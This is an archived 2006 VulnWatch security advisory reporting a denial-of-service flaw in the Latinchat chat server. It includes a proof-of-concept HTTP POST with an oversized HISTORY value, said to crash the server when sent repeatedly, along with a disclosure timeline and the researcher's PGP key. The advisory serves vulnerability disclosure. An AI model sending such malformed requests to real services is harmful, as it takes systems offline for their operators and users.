[VulnWatch] Latinchat Denial Of Service

From: Vicente Perez (vp.vicenteperez@private)
Date: Wed Aug 09 2006 - 00:04:26 PDT


Denial Of Service on Chat Magma Latinchat
http://www.latinchat.com
 
Researcher: Vicente Perez
 
1.-Overview
 
Latinchat is one of the most known chat server, and used basically by
latin american people.
 
2.-Description

This system has a vulnerabily as DoS, taking system offline by a while.

The fail happens when the histroy variable is not properly checked by
system, and when the request, is modified by a mal intencionated user,
can take the system down. History variable is used to show the last X
messages sent to the room before the conexion takes place.

A POC has been writed as:

POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp006-org.latinchat.com
Content-length: 142

UserName=Pentest&SessionID=C247b19b2a&TEMPLATE=2&RoomID=R29_6-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999

When this URL is sent for a spefied times, the server crash.

4.- Disclosure Timeout
Vendor COntacted: 08-Julio-2006 Vendor never response.
Public Advisory: 08-Agosto-2006
 
5.- Copyright
 
http://www.securitynation.com - Security Nation is a Lab Supported by
RISS Security Services.
http://www.riss.com.mx
vicente.perez@private
Copyright SecurityNation.   
Contact: vp.vicenteperez@private
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.5 (MingW32) - WinPT 0.9.92

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
v5epLj9RxxnqdWDtT2vy2uHx0j9X
=V9Ch
-----END PGP PUBLIC KEY BLOCK-----






This archive was generated by hypermail 2.1.3 : Wed Aug 09 2006 - 18:10:03 PDT